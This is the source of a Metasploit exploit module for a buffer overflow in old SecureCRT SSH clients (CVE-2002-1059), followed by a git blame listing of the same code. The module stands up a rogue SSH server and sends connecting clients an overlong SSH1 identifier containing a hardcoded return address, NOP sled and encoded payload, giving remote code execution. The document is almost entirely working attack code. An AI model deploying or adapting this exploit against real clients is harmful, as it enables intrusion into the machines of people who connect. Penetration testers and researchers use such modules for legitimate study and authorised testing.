modules/exploits/windows/ssh/securecrt_ssh1.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SecureCRT SSH1 Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in SecureCRT <= 4.0
          Beta 2. By sending a vulnerable client an overly long
          SSH1 protocol identifier string, it is possible to execute
          arbitrary code.

          This module has only been tested on SecureCRT 3.4.4.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2002-1059' ],
          [ 'OSVDB', '4991' ],
          [ 'BID', '5287' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00",
          'MaxNops' => 0,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2002-07-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
      ]
    )
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
    buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded

    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

    client.put(buffer)
    handler

    service.close_client(client)
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::TcpServer`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'SecureCRT SSH1 Buffer Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a buffer overflow in SecureCRT <= 4.0`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`Beta 2. By sending a vulnerable client an overly long`
			`SSH1 protocol identifier string, it is possible to execute`
			`arbitrary code.`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`This module has only been tested on SecureCRT 3.4.4.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' => [`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`[ 'CVE', '2002-1059' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '4991' ],`
			`[ 'BID', '5287' ],`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`'EXITFUNC' => 'process',`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 400,`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`'BadChars' => "\x00",`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'MaxNops' => 0,`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`'StackAdjustment' => -3500,`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'DisclosureDate' => '2002-07-23',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
			`register_options(`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`end`

			`def on_client_connect(client)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`return if ((p = regenerate_payload(client)) == nil)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded`

			`print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")`

			`client.put(buffer)`
			`handler`

			`service.close_client(client)`
			`end`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`end`